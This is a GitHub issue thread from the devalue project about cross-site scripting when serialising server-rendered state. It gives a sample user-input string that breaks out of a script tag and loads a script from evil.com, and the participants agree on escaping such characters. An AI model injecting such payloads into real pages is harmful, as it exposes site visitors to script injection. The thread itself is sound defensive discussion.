Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS #1

Closed
Rich-Harris opened this issue Mar 10, 2018 · 3 comments
Closed

XSS #1

Rich-Harris opened this issue Mar 10, 2018 · 3 comments

Comments

@Rich-Harris
Copy link
Owner

Say you're server-rendering a page and want to serialize some state, which could include user input. JSON.stringify doesn't protect against XSS attacks:

const state = {
  userinput: `</script><script src='https://evil.com/mwahaha.js'>`
};

const template = `
<script>
  var preloaded = ${JSON.stringify(state)};
</script>
`;

That would result in this...

<script>
  var preloaded = {"userinput":"</script><script src='https://evil.com/mwahaha.js'>"};
</script>

...which would obviously load a script from evil.com.

The same is true of devalue. We should be able to prevent those attacks by replacing any instance of </ with <\u002f, though I'd love for someone else to tell me if I'm right about that.

@rbadr
Copy link

rbadr commented Mar 10, 2018

Hi Rich,

You can prevent these attacks by escaping HTML characters. You can use or check the implementation of serialze-javascript developed by Yahoo, it provides these safety practices.

</script> will be transformed to \u003C\u002Fscript\u003E for example.

@Rich-Harris
Copy link
Owner Author

Excellent, thank you! I'll borrow that code.

@rbadr
Copy link

rbadr commented Mar 10, 2018

You're welcome.

Rich-Harris added a commit that referenced this issue Mar 10, 2018
aldarund added a commit to aldarund/devalue that referenced this issue Oct 13, 2018
* warn instead of error for non pojo attrs

* change refs

* add support for objects with toJson method
Rich-Harris#1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants